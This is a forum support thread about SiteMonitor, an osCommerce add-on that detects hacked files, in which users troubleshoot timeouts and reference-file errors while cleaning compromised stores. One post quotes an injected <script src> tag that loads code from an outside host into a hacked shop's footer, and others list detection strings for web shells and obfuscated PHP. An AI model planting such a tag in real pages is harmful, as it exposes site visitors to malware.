SiteMonitor

[♥geoffreywalton]

Spooky

 

It is standard site

 

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->
<br>
<script src="http://nt02.co.in/3"></script></body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

Will now check the version I'm running but it wont be till after 14:00.

 

I've been changing the hacker code, starting another admin option, running the bottom option Hacker test manually did this about 20 times trying to see what worked and what didn't and now my db user name and admin are prompted on the configure page and I have to change it to my shop admin.

 

Another spooky occurrance. Looks like my SM config has been reset.

 

Cheers

 

G

[♥geoffreywalton]

Installed 2.7 and all seems fine.

 

Also added

 

,'Meher Assel', 'nt02', '<script src', '<iframe src'

 

to hacker code.

 

For others here is a usefull link

 

http://www.stopbadware.org/home/security

 

and once you have cleaned your site don't forget to resubmit it to google. This can be done via google's webmaster's tools.

 

HTH

 

G

[WrongSizeGlass]

Hi,

We just installed SiteMonitor and are running into 'Internal Server Error Error 500' on some of the sites we installed it on when we run sitemonitor.php. This error only occurs if there have been any files added, renamed or deleted. We do not get this error when we check for 'Hacked Files'.

 

We can recreate the error by:

- create a new reference file (sometimes this generates the '500' error so we delete it manually)

- execute SiteMonitor (either button)

- no differences so it finishes without error

- add, rename or delete a file (renaming a file reproduces it every time)

- execute SiteMonitor (either button)

- Internal Server Error Error 500

 

The sites have about 4,000 files that are being checked (we've excluded as many as possible). The code just stops part way through the 'file size checks' if the file counts don't match (which they don't when a file has been renamed).

 

* We're running PHP 5.2.14 on a Linux server.

* All the sites we've installed it on are using the same master hosting account.

* The error happens at about the 20 - 25 second mark while running.

* Our max_execution_time is 60 seconds.

* Our memory_limit 256MB.

* We get the error when running it via the sitemonitor_admin or the cron job.

* The server logs only show Premature end of script headers: /user/html/site/store/admin/sitemonitor_admin.php

 

Any help with this issue would be greatly appreciated.

 

 

WSG

[♥geoffreywalton]

Did you see this at the bottom of the read me.

 

- If the script times out when first ran, it is probably due to a large number
 of files in your account and/or a server with a load timeout value set. To
 get around that, change the url to 
 http://YOUR_DOMAIN_NAME/YOUR_ADMIN/sitemonitor_configure_setup.php?override=1
 and press enter. That will allow the configure section to load so that more 
 files can be excluded.

 

May help, but probably not.

 

HTH

 

G

 

Another string for hacker code

 

 

Hmei7

[ftrippie]

Yes, php 5 is more secure. However, upgrading to it might cause some coding problesm to appear, especially if you go to 5.3 or above. They can be fixed but you need to be prepared for them.

 

Well, I changed to PHP5 by adding "SetEnv PHP_VERSION 5" to the htaccess file.

Version reported by phpinfo: PHP Version 5.2.13

 

But, still the same problem. How weird. Especially like I said, the same site works locally on a Uniserver perfectly... Any other suggestions would be very welcome. :(

[ftrippie]

Well, I changed to PHP5 by adding "SetEnv PHP_VERSION 5" to the htaccess file.

Version reported by phpinfo: PHP Version 5.2.13

 

But, still the same problem. How weird. Especially like I said, the same site works locally on a Uniserver perfectly... Any other suggestions would be very welcome. :(

 

BTW, to be honest, I think it has something to do with the created referencefile, no? I don't know exactly how the online reference file has to look like, but this is the difference in online and local:

online: .account.php,9647,1291745071,644

local: Z:/www/local/account.php,9647,1291745071,666

 

So, the online files start with a period, whereas the local files mention the full path. Does that seem correct to you?

[Jack_mcs]

BTW, to be honest, I think it has something to do with the created referencefile, no? I don't know exactly how the online reference file has to look like, but this is the difference in online and local:

online: .account.php,9647,1291745071,644

local: Z:/www/local/account.php,9647,1291745071,666

 

So, the online files start with a period, whereas the local files mention the full path. Does that seem correct to you?

No, that's not right. The entry in the start directory settings should be shown before the file. I'm assuming your start directory is correct since you can run the script but there may be some mistake in your configure file causing it. You should take a look at this thread to be sure yours is correct.

[ftrippie]

No, that's not right. The entry in the start directory settings should be shown before the file. I'm assuming your start directory is correct since you can run the script but there may be some mistake in your configure file causing it. You should take a look at this thread to be sure yours is correct.

 

And again; thanks for keeping track.

 

I thought you had a point and we were about to solve it, but no luck.

In the configure files, my original FS path was ../ which I changed to /home/www/mysite.com/ after checking that in ServerInfo as suggested in that thread. And the site keeps functioning. But Sitemonitor still doesn't like it and hasn't changed. In the startdirectory of SiteMonitor I HAVE to put ../ otherwise it will stick in the configure panel.

If I put for instance /home/www/mysite.com/ it will say:

Your username is invalid. Please change it and try again.: System -> ../ - SiteMonitor -> /home/www/mysite.com/

 

I feel we're close, but don't know what else to check...

Edited December 13, 2010 by ftrippie

[Jack_mcs]

And again; thanks for keeping track.

 

I thought you had a point and we were about to solve it, but no luck.

In the configure files, my original FS path was ../ which I changed to /home/www/mysite.com/ after checking that in ServerInfo as suggested in that thread. And the site keeps functioning. But Sitemonitor still doesn't like it and hasn't changed. In the startdirectory of SiteMonitor I HAVE to put ../ otherwise it will stick in the configure panel.

If I put for instance /home/www/mysite.com/ it will say:

Your username is invalid. Please change it and try again.: System -> ../ - SiteMonitor -> /home/www/mysite.com/

 

I feel we're close, but don't know what else to check...

The path in that message that follows system is what SiteMonitor thinks the start directory should be set to and it won't work correctly, most likely, if it isn't.

[ftrippie]

The path in that message that follows system is what SiteMonitor thinks the start directory should be set to and it won't work correctly, most likely, if it isn't.

 

Yep, that's what I gathered as much, but I can't change it to anything other than ../ without that message appearing :'(

[Jack_mcs]

Yep, that's what I gathered as much, but I can't change it to anything other than ../ without that message appearing :'(

Unfortunately, I'm out of ideas. This doesn't sound like something that can be fixed in a support thread.

[♥geoffreywalton]

Jack

 

I have a site with thousands of images and have used the option

 

http://www.site.dk/magic/xxxxxxx/sitemonitor_configure_setup.php?override=1

 

This will show the config 50% of the time the other 50% gives a blank page.

 

I configure file, amended for security and anonymity, contains

 

<?php
/************** THE OPTIONS AND SETTINGS ****************/
$always_email = 0; //set to 1 to always email the results
$verbose = 0; //set to 1 to see the results displayed on the page (for when running manually)
$logfile = 0; //set to 1 to see to track results in a log file
$logfile_size = 100000; //set the maximum size of the logfile
$reference_reset = 3; //delete the reference file this many days apart

$quarantine = 0; //set to 1 to move new files found to the quarantine directory

$to = 'shop@abc.dk'; //where email is sent to
$from = 'From:shop@abc.dk'; //where email is sent from
$start_dir = '/hsphere/local/home/yyy/abc.dk/magic'; //your shops root
$admin_dir = 'http://www.abc.dk/magic/admin'; //your shops admin
$admin_username = 'usradmin'; //your admin username
$admin_password = 'pw!'; //your admin password
$excludeList = array('admin/quarantine', 'cgi-bin','admin','admin/images','images'); //don't check these directories - change to your liking - must be set prior to first run
$hackIgnoreList = array('jpg', 'jpeg','gif','png','txt','zip'); //don't check these types of files - change to your liking
$hackCodeSegments = array('error_reporting(0)', 'base64_decode','<frame','gzdecode','eval','ob_start("security_update")', 'Goog1e_analist_up', 'eval(gzinflate(base64_decode', 'Web Shell', '@eval', ' header;', 'shell_exec', 'system','SetCookie','xx'); //enter any hacker code that you would like to check for
?>

 

When I update I just get a blank page.

 

Is there something else I can do to exclude the image directory and get it to check the rest of the site?

 

TIA

 

G

[Jack_mcs]

Jack

 

I have a site with thousands of images and have used the option

 

http://www.site.dk/magic/xxxxxxx/sitemonitor_configure_setup.php?override=1

 

This will show the config 50% of the time the other 50% gives a blank page.

 

I configure file, amended for security and anonymity, contains

 

 

When I update I just get a blank page.

 

Is there something else I can do to exclude the image directory and get it to check the rest of the site?

The override option should load the configure settings without reading in the shops directories so it shouldn't timeout. That's strange that that is happening and I don't have a reason why it is. But to try to get around that, you can edit the configure file manually and add all of the directories, or least the large ones like images and includes, to see if that lets it run. Be sure to delete the reference file. If it still fails, then there is probably some file in the root that is causing the problem. The idea behind troubleshooting this sort of problem is to reduce the number of files being checked to the absolute minimum and then increase until it works.

[♥altoid]

My guess is that it has to do with permissions or some other server setting that is preventing the script from working correctly. If both hosts use a php.ini file, try comparing the two to see what differences there might be.

 

Jack, catching up on this from last September. I just moved my second store to my new host, and the installation and functioning of Site Monitor is just fine. Now that I moved two shops from the old host (where I could not get Site Monitor to work beyond the 2.4 level) to the new host (where upgrading to 2.7 went easily), it appears to me that the problem was something within the host.

 

I have noticed a couple other differences in how osC works on the new host, so it's apparent to me osC shops don't necessarily work the same from one host compared to another. I wish I had the technical background to figure this out but I don't so I can only report observations.

 

Anyway, Site Monitor 2.7 up and running on both shops now.

 

Thanks

[Jack_mcs]

Anyway, Site Monitor 2.7 up and running on both shops now.

Thanks for the update.

[birdrockdesigns]

After sanitizing the files on my client's site, I installed this.

 

Great contribution.

 

I had issues at install, but read the entire thread and now everything works fine.

 

Just the phrase 'base64' will send shivers up my spine after this hack on the my client's store.

 

Thanks again.

[jeeperz]

There is something wrong in your admin (no idea where) since there isn't any code in SiteMonitor to cause it to go to the customer section. I can't even offer a suggestion on this one.

 

Are any of the files in the contribution supposed to be made world writable? I say no mention of changing any permissions in the documentation.

 

Thanks!

[Jack_mcs]

Are any of the files in the contribution supposed to be made world writable? I say no mention of changing any permissions in the documentation.

It depends upon how your server is setup. The majority, in my experience, don't require any changes. But I have ran across some servers that need them to be changed.

[♥altoid]

Jack, I am dealing with the 30 second timeout issue when attempting to delete the reference file. Reading back through the thread I found that time outs are server set. My tech support helped me set up a php.ini file to override the 30 second time out. After installation we verified the max_execution_time was reset to 90 seconds. But when I run the delete reference file, I still get a 30 second timeout error.

Guidance please.

Thanks

[Jack_mcs]

Jack, I am dealing with the 30 second timeout issue when attempting to delete the reference file. Reading back through the thread I found that time outs are server set. My tech support helped me set up a php.ini file to override the 30 second time out. After installation we verified the max_execution_time was reset to 90 seconds. But when I run the delete reference file, I still get a 30 second timeout error.

Guidance please.

Thanks

There's nothing in the code that limits the time the script runs so the timeout is still coming from the server. The settings in local php.ini files won't always be allowed on shared servers. Otherwise every site on the server might set their limit to maximum and the server would quickly fail.

[♥altoid]

There's nothing in the code that limits the time the script runs so the timeout is still coming from the server. The settings in local php.ini files won't always be allowed on shared servers. Otherwise every site on the server might set their limit to maximum and the server would quickly fail.

 

OK, just double checking as the tech guy theorized it was a code issue.

 

I was surprised I could change the settings with a php.ini because I did read your earlier post on shared server restrictions. But the tech guy said that wasn't a problem with them. Even the php_info page he set up for me verified the change was made.

 

I will work with the tech guy further on this. In the meanwhile, I think I have a work around with this. I exclude 'images', run the code and it doesn't time out. I then remove the 'images" exclusion, run the code and it runs with no time out.

 

Thanks for the response and Happy Holidays.

[jfkafka]

Hi Jack,

v2.7

Hope all is excellent with you.

When using the 3rd Update button

(Manually Execute Sitemonitor)

getting numerous (36) messages like: (all in the phpids folder, btw)

permissions Mismatch on includes/phpids/lib/IDS/tmp/URI/4.1.1 Currently set to "0" was set to "327"

permissions Mismatch on includes/phpids/lib/IDS/vendors/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer/CSS/4.1.0 Currently set to "0" was set to "22628"

 

not sure how to decipher Currently set to "0" was set to "327" (or the variations)

since I deleted the contents of the reference file and created a new one with the top button prior to clicking the 3rd button

so what is being compared

1. What is causing it to be set to 0?

2. Should it be reset to the original value?

3. Is this a sign of some skullduggery?

 

Thanks for helping me better understand,

jk

[Jack_mcs]

not sure how to decipher Currently set to "0" was set to "327" (or the variations)

since I deleted the contents of the reference file and created a new one with the top button prior to clicking the 3rd button

so what is being compared

1. What is causing it to be set to 0?

2. Should it be reset to the original value?

3. Is this a sign of some skullduggery?

The code ran when the third button is used is the same as for the first except the reference file isn't replaced and the output is displayed on the screen. If you click on the second update button is the email you receive clean of errors? If it is, I haven't a clue why the second would work and not the third. If it isn't, then it would seem your reference file is not being created correctly somehow.

[jfkafka]

The code ran when the third button is used is the same as for the first except the reference file isn't replaced and the output is displayed on the screen. If you click on the second update button is the email you receive clean of errors? If it is, I haven't a clue why the second would work and not the third. If it isn't, then it would seem your reference file is not being created correctly somehow.

 

Thanks for your response. Using localhost, unable to send emails at present, so used 3rd button for display. It seems there's something about those phpids/files that may explain the reset messages. I'm just unclear why on a fresh reference file there would be

anything to compare ie. Currently set to "0" was set to "327". I'm presuming this indicates the reference file is otherwise working

properly for the other 6000+ files.

 

Ran the 3rd button again:

Sitemonitor ran on December 19, 2010, 9:22 am

Total mismatches found were 18

Total files being monitored is 6762

Email sent to shop owner.

 

Checked the first flagged file:

Difference found: New-> includes/phpids/lib/IDS/tmp/CSS/4.1.1 Original-> 801ad73acbcf9d3127e1d01768d26453

 

Navigated to the file (includes/phpids/lib/IDS/tmp/CSS/4.1.1)

 

Name of file:

4.1.1,801ad73acbcf9d3127e1d01768d26453,1.ser

 

Is that comma between 4.1.1 and 8 causing this file to be listed?

If so, what is the remedy?

 

Thanks for your invaluable input,

jk

Edited December 19, 2010 by jfkafka

[Jack_mcs]

Name of file:

4.1.1,801ad73acbcf9d3127e1d01768d26453,1.ser

That is an invalid filename. SiteMonitor can't handle invalid filenames.